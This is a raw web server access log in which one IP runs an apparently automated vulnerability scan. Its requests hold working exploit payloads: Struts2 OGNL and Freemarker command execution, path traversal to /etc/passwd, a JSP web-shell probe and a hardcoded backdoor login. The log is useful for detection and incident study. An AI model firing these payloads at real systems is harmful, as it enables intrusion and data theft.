195.164.49.69 - - [20/Oct/2024:15:08:08 +0000] GET /catalog-portal/ui/oauth/verify?error&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:08:09 +0000] GET /zabbix/setup.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:08:10 +0000] GET /setup.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:08:11 +0000] GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:08:12 +0000] GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:08:13 +0000] GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:15:08:14 +0000] GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:15:08:15 +0000] GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:08:16 +0000] GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:08:17 +0000] GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1 404 1187
195.164.49.69 - - [20/Oct/2024:15:08:18 +0000] GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/Jz9K.css HTTP/1.1 404 1178
195.164.49.69 - - [20/Oct/2024:15:08:19 +0000] GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/ZArf.css HTTP/1.1 404 1191
195.164.49.69 - - [20/Oct/2024:15:08:20 +0000] GET /wp-content/plugins/give/readme.txt HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:15:08:21 +0000] GET /dump HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:15:08:22 +0000] GET /actuator/dump HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:08:23 +0000] GET /logfile HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:15:08:24 +0000] GET /actuator/logfile HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:08:25 +0000] GET /actuators/logfile HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:08:26 +0000] GET /%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:15:08:27 +0000] GET /passwordrecovered.cgi?id=kP0H8 HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:08:30 +0000] POST /scripts/setup.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:08:30 +0000] GET /reports/rwservlet/showenv HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:08:31 +0000] GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:08:33 +0000] GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 404 1086
- - - [20/Oct/2024:15:08:33 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:15:08:33 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:08:33 +0000] GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 404 1086
- - - [20/Oct/2024:15:08:33 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:15:08:33 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:08:33 +0000] GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 404 1086
- - - [20/Oct/2024:15:08:33 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:15:08:33 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:08:41 +0000] POST /website/blog/ HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:08:42 +0000] POST /_search HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:15:08:43 +0000] POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:15:08:45 +0000] PUT /poc.jsp/ HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:15:08:46 +0000] GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:15:08:54 +0000] GET /cgi-bin/chn/liveView?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:08:55 +0000] GET /cgi-bin/admin?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:08:55 +0000] GET /cgi-bin/apply?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:08:55 +0000] GET /cgi-bin/non-CA-rev?LD_DEBUG=help HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:08:55 +0000] GET /cgi-bin/cgitest?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:08:55 +0000] GET /cgi-bin/checkCookie?LD_DEBUG=help HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:08:55 +0000] GET /cgi-bin/check_user?LD_DEBUG=help HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:08:55 +0000] GET /cgi-bin/firmware?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:08:55 +0000] GET /cgi-bin/cht/liveView?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:08:55 +0000] GET /cgi-bin/cnswebserver?LD_DEBUG=help HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:08:55 +0000] GET /cgi-bin/config?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:08:55 +0000] GET /cgi-bin/configure/set_link_neg?LD_DEBUG=help HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:08:55 +0000] GET /cgi-bin/configure/swports_adjust?LD_DEBUG=help HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:15:08:55 +0000] GET /cgi-bin/eng/liveView?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:08:57 +0000] GET /cgi-bin/guest/Login?LD_DEBUG=help HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:08:57 +0000] GET /cgi-bin/getCheckCode?LD_DEBUG=help HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:08:57 +0000] GET /cgi-bin/get_status?LD_DEBUG=help HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:08:57 +0000] GET /cgi-bin/getmac?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:08:57 +0000] GET /cgi-bin/getparam?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:08:57 +0000] GET /cgi-bin/index?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:08:57 +0000] GET /cgi-bin/home?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:08:57 +0000] GET /cgi-bin/htmlmgr?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:08:58 +0000] GET /cgi-bin/index/login?LD_DEBUG=help HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:08:58 +0000] GET /cgi-bin/jscript?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:08:58 +0000] GET /cgi-bin/kvm?LD_DEBUG=help HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:09:19 +0000] GET /cgi-bin/liveView?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:09:19 +0000] GET /cgi-bin/login?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:09:19 +0000] GET /cgi-bin/login.asp?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:09:19 +0000] GET /cgi-bin/login/login?LD_DEBUG=help HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:09:20 +0000] GET /cgi-bin/login/login-page?LD_DEBUG=help HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:15:09:20 +0000] GET /cgi-bin/login_mgr?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:09:20 +0000] GET /cgi-bin/luci?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:09:20 +0000] GET /cgi-bin/main?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:09:20 +0000] GET /cgi-bin/main-cgi?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:09:20 +0000] GET /cgi-bin/manage/login?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:09:20 +0000] GET /cgi-bin/menu?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:09:20 +0000] GET /cgi-bin/mlogin?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:09:20 +0000] GET /cgi-bin/netbinary?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:09:20 +0000] GET /cgi-bin/nobody/Captcha?LD_DEBUG=help HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:09:22 +0000] GET /cgi-bin/nobody/VerifyCode?LD_DEBUG=help HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:09:22 +0000] GET /cgi-bin/normal_userLogin?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:09:22 +0000] GET /cgi-bin/otgw?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:09:22 +0000] GET /cgi-bin/page?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:09:22 +0000] GET /cgi-bin/rulectl?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:09:22 +0000] GET /cgi-bin/service?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:09:22 +0000] GET /cgi-bin/set_new_config?LD_DEBUG=help HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:09:22 +0000] GET /cgi-bin/sl_webviewer?LD_DEBUG=help HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:09:22 +0000] GET /cgi-bin/ssi?LD_DEBUG=help HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:09:22 +0000] GET /cgi-bin/status?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:09:22 +0000] GET /cgi-bin/sysconf?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:09:41 +0000] GET /cgi-bin/systemutil?LD_DEBUG=help HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:09:42 +0000] GET /cgi-bin/t/out?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:09:42 +0000] GET /cgi-bin/top?LD_DEBUG=help HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:09:42 +0000] GET /cgi-bin/unauth?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:09:42 +0000] GET /cgi-bin/upload?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:09:42 +0000] GET /cgi-bin/variable?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:09:42 +0000] GET /cgi-bin/wanstatu?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:09:42 +0000] GET /cgi-bin/webcm?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:09:42 +0000] GET /cgi-bin/webmain?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:09:42 +0000] GET /cgi-bin/webproc?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:09:42 +0000] GET /cgi-bin/webscr?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:09:42 +0000] GET /cgi-bin/webviewLogin?LD_DEBUG=help HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:09:42 +0000] GET /cgi-bin/webviewLogin_m64?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:09:42 +0000] GET /cgi-bin/webviewer?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:09:43 +0000] GET /cgi-bin/welcome?LD_DEBUG=help HTTP/1.1 404 1093
77.87.163.227 - - [20/Oct/2024:15:09:56 +0000] GET /ReplicationManager/api/api_v1/status HTTP/1.1 200 137
195.164.49.69 - - [20/Oct/2024:15:10:03 +0000] POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 404 1161
195.164.49.69 - - [20/Oct/2024:15:10:04 +0000] GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2nht064AhtzpSg5KqjCigb79kHy.jsp HTTP/1.1 404 1200
195.164.49.69 - - [20/Oct/2024:15:10:05 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:10:07 +0000] POST /crowd/admin/uploadplugin.action HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:15:10:08 +0000] GET /crowd/plugins/servlet/exp HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:15:10:12 +0000] POST /photo/p/api/album.php HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:10:14 +0000] GET /api/experimental/test HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:10:15 +0000] GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 404 1155
195.164.49.69 - - [20/Oct/2024:15:10:16 +0000] POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 404 1147
195.164.49.69 - - [20/Oct/2024:15:10:18 +0000] POST /run HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:15:10:30 +0000] POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 404 1158
195.164.49.69 - - [20/Oct/2024:15:10:32 +0000] GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:10:33 +0000] GET /ext-js/index.html HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:10:34 +0000] POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:15:10:44 +0000] GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 404 1083
83.212.98.101 - - [20/Oct/2024:15:10:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:15:10:49 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:10:50 +0000] POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:15:10:50 +0000] GET /owa/auth/x.js HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:10:51 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:10:52 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:10:53 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:10:54 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:10:55 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:10:56 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:10:58 +0000] PUT /SDK/webLanguage HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:15:10:59 +0000] GET /x HTTP/1.1 404 1075
195.164.49.69 - - [20/Oct/2024:15:11:00 +0000] GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:11:01 +0000] GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:11:02 +0000] POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:11:07 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:11:09 +0000] GET /STATE_ID/123/agentLogUploader HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:15:11:12 +0000] GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1 404 1365
195.164.49.69 - - [20/Oct/2024:15:11:14 +0000] POST /conf_mail.php HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:11:16 +0000] POST /xmlrpc HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:15:11:17 +0000] GET /rest/api/latest/repos HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:11:20 +0000] POST /SamlResponseServlet HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:11:21 +0000] POST /%2577eb%2575i_%2577sma_Http HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:11:22 +0000] POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1 404 1160
195.164.49.69 - - [20/Oct/2024:15:11:32 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:33 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:33 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:33 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:33 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:33 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:33 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:33 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:33 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:33 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:34 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:34 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:34 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:34 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:34 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:34 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:34 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:34 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:35 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:35 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:35 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:35 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:35 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:35 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:35 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:55 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:56 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:56 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:56 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:56 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:56 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:56 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:56 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:56 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:56 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:56 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:57 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:57 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:57 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:57 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:11:57 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:11:57 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:11:57 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:11:57 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:11:58 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:12:08 +0000] POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 404 1134
195.164.49.69 - - [20/Oct/2024:15:12:09 +0000] POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:15:12:11 +0000] POST /minio/bootstrap/v1/verify HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:15:12:13 +0000] GET /_api/web/siteusers HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:12:14 +0000] GET /_api/web/siteusers HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:12:16 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:12:17 +0000] POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:12:18 +0000] POST /guestaccess.aspx HTTP/1.1 404 1090
83.212.98.101 - - [20/Oct/2024:15:12:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:15:12:32 +0000] PATCH /mgmt/tm/auth/user/g5OMY HTTP/1.1 501 1095
195.164.49.69 - - [20/Oct/2024:15:12:33 +0000] POST /mgmt/shared/authn/login HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:15:12:34 +0000] POST /mgmt/tm/util/bash HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:12:35 +0000] PATCH /mgmt/tm/auth/user/g5OMY HTTP/1.1 501 1095
195.164.49.69 - - [20/Oct/2024:15:12:36 +0000] POST /mgmt/shared/authn/login HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:15:12:37 +0000] POST /mgmt/tm/util/bash HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:12:37 +0000] POST /userentry?accountId=/../../../tomcat/webapps/mXAaR/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:12:47 +0000] GET /mXAaR/CVE-2023-47246.txt?true HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:12:48 +0000] POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:15:12:51 +0000] GET /cgi-mod/view_help.cgi HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:12:52 +0000] GET /cgi-mod/index.cgi HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:12:52 +0000] GET /cslu/v1/scheduler/jobs HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:15:12:53 +0000] GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:15:12:54 +0000] POST /app/rest/users/id:1/tokens/2nht0Bq15XoUPuOe2nUzJXiWMyH;.jsp?jsp_precompile=true HTTP/1.1 404 1153
